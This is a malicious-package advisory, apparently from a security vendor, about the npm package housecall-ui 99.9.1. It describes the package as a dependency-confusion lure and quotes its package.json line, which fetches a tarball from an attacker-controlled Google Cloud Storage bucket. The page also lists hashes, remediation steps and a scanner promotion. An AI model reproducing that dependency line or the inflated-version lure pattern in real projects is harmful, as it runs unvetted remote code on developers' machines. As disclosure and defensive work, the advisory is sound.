Which versions of housecall-ui are malicious?

The following npm versions of housecall-ui are flagged malicious: 99.9.1. Treat any of these as compromised.

How do I remediate housecall-ui if I installed it?

Remove housecall-ui from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is housecall-ui part of a known attack campaign?

Yes — housecall-ui is associated with the IN-MAL-2026-005029, IN-MAL-2026-005030 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect housecall-ui in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking housecall-ui and packages like it before any post-install script runs.

Malicious package

housecall-uinpm

Malicious code in housecall-ui (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5446

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall housecall-ui

What this malware does

[email protected] is a hollow npm package (empty description, empty author, index.js exports an empty object) whose sole runtime dependency is declared as an HTTPS tarball URL pointing at a third-party Google Cloud Storage bucket: "ltidisafe": "https://ltidi.storage.googleapis.com/depenconf/ltidisafe-2.9.8.tgz" (package.json line 10). On npm install, npm fetches whatever bytes currently reside at that GCS URL and executes any lifecycle scripts (preinstall/install/postinstall) inside the resulting tarball. The bucket is not the npm registry, is not a documented publisher infrastructure for any vendor, is unpinned by hash, and is mutable by whoever controls it — meaning the installer cannot audit or guarantee what code will run. The package's name is brand-adjacent to HouseCall Pro and the version is artificially inflated to 99.9.1, the canonical pattern of a dependency-confusion lure designed to outrank an internal private package of the same name in mixed-resolution environments. The surrounding package contributes no functionality; its only effect on install is to sideload ltidisafe from attacker-mutable infrastructure.

Malicious versions

1 flagged

99.9.1

Indicators of compromise (SHA-256)

67e32f5c0c623ab57ac1de78fb5e118394d96f79b760af74d4127f775a0a97fe

fac4b593cce0ccef6f616ac18250600b6692702eedba77bff01a290e1c07b2fa

Frequently asked questions

No. housecall-ui on npm has been identified as a malicious package (version 99.9.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005029IN-MAL-2026-005030

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection